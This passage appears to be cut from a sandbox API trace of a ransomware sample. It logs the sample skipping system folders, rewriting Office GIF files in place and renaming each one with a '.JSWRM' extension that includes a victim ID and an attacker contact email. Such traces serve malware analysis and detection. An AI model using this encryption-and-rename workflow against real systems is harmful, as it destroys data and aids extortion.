returned 0x23a300 [0119.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.245] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf47, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR32B.GIF", cAlternateFileName="")) returned 1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2=".") returned 1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="..") returned 1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="...") returned 1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="windows") returned -1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="recovery") returned -1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="perflogs") returned -1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="documents and settings") returned 1 [0119.245] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.246] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="system volume information") returned -1 [0119.246] lstrcmpiW (lpString1="PDIR32B.GIF", lpString2="msocache") returned 1 [0119.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR32B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR32B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0119.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0119.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.247] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3911) returned 1 [0119.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf40) returned 0x24c1d0 [0119.247] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xf40, lpOverlapped=0x0) returned 1 [0119.251] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.251] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xf40, lpOverlapped=0x0) returned 1 [0119.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.251] CloseHandle (hObject=0x314) returned 1 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0119.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.252] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR32F.GIF", cAlternateFileName="")) returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2=".") returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="..") returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="...") returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="windows") returned -1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="recovery") returned -1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="perflogs") returned -1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="documents and settings") returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="system volume information") returned -1 [0119.254] lstrcmpiW (lpString1="PDIR32F.GIF", lpString2="msocache") returned 1 [0119.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR32F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0119.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR32F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR32F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.255] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=37131) returned 1 [0119.255] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9100) returned 0x24e1d8 [0119.255] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x9100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x9100, lpOverlapped=0x0) returned 1 [0119.262] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.262] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x9100, lpOverlapped=0x0) returned 1 [0119.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.263] CloseHandle (hObject=0x314) returned 1 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0119.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0119.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0119.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.264] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1631, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR33B.GIF", cAlternateFileName="")) returned 1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2=".") returned 1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="..") returned 1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="...") returned 1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="windows") returned -1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="recovery") returned -1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="perflogs") returned -1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="documents and settings") returned 1 [0119.264] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.265] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="system volume information") returned -1 [0119.265] lstrcmpiW (lpString1="PDIR33B.GIF", lpString2="msocache") returned 1 [0119.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR33B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0119.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR33B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR33B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.266] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5681) returned 1 [0119.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1630) returned 0x24e1d8 [0119.266] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1630, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1630, lpOverlapped=0x0) returned 1 [0119.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.294] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1630, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1630, lpOverlapped=0x0) returned 1 [0119.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.294] CloseHandle (hObject=0x314) returned 1 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0119.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0119.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.294] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0119.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.296] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, 